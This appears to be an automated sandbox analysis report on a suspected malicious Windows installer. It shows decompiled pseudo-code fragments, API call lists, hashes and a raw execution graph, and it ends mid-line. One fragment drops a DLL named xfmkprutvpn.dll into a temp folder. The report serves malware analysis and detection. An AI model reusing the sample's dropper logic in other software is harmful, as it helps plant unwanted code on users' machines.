					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                  0x004024b0
                  0x004024b0
                  0x004024b3
                  0x004024ce
                  0x004024b5
                  0x004024b7
                  0x004024bc
                  0x004024c3
                  0x004024d5
                  0x0040264e
                  0x0040264e
                  0x004024db
                  0x004024ed
                  0x004015a6
                  0x004015a8
                  0x00000000
                  0x004015ae
                  0x004015a8
                  0x00402880
                  0x0040288c

                  APIs
                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                  Strings
                  • C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll, xrefs: 004024BC, 004024E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileWritelstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll
                  • API String ID: 427699356-170057338
                  • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                  • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                  • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                  • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                  0x004055c0
                  0x004055ca
                  0x004055cc
                  0x004055d3
                  0x004055db
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004055db
                  0x004055dd
                  0x004055e2

                  APIs
                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\kVijllv0Yl.exe,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 004055C5
                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\kVijllv0Yl.exe,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 004055D3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharPrevlstrlen
                  • String ID: C:\Users\user\Desktop
                  • API String ID: 2709904686-3125694417
                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                  • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                  • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                  0x004056dd
                  0x004056df
                  0x00405707
                  0x004056ec
                  0x004056f1
                  0x004056fc
                  0x00000000
                  0x00405719
                  0x00405705
                  0x00405705
                  0x00000000

                  APIs
                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: lstrlen$CharNextlstrcmpi
                  • String ID:
                  • API String ID: 190613189-0
                  • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                  • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                  • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                  • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:31.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.3%
                  Total number of Nodes:1846
                  Total number of Limit Nodes:97
                  execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap RtlFreeHeap 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 14 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 13 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 12 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8520 40c4e3 8514->8520 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8520 8522 4040bb 12 API calls 8519->8522 8520->8515 8521 405f08 4 API calls 8523 40c005 8521->8523 8524 40c3f3 8522->8524 8525 40c021 8523->8525 8658 40a43f 8523->8658 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8533 40c4dd 8532->8533 8536 405695 2 API calls 8533->8536 8534 40c411 8720 405a87 8534->8720 8535 402bab 2 API calls 8535->8525 8536->8520 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8623->8625 8624 402bab GetProcessHeap RtlFreeHeap 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 12 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap RtlFreeHeap 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 12 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap RtlFreeHeap 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8521 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8535 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8534 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap RtlFreeHeap 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API 